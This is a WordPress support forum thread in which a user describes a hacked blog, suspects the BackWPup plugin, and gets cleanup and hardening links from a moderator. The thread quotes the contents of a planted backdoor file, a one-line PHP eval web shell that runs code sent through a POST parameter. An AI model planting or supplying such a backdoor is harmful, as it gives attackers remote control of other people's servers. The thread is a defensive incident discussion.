The version was : Stable tag: 3.0.11
The content of md5.php was :
<?php @eval($_POST['omg']);?>
Nico
Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
Some files appears like md5.php file in the root directory of my blog. Or with a common name that seems normal like /images/index.html.
I don’t know if you have an exploit with BackWPup but your site was compromised and needs to be deloused.
This is an often quoted response (I’m trying to avoid Copy/Pasta [it’s an inside joke]) but those links can really help you get a handle on your situation.
You need to start working your way through these resources:
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Anything less will probably result in the hacker walking straight back into your site again.
Additional Resources:
Hardening WordPress
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
Give those a start and hopefully you can lock down and fix your installation.
I have already fixed my installations (3 WP with the same problem on the same host). I made a lot of tests (about several weeks and scientific method ;o) ) and a vulnerabilty in backWPup is my last conclusion (even if I can off course be wrong).
Thanks for the links : I have done the entire list of the first link few times (more than 5). Only when I didn’t upload again the plugin, installation was staying clean until today (it was more than 1 month ago – and attacks came between 3 and 7 days after the cleanup).
Nico
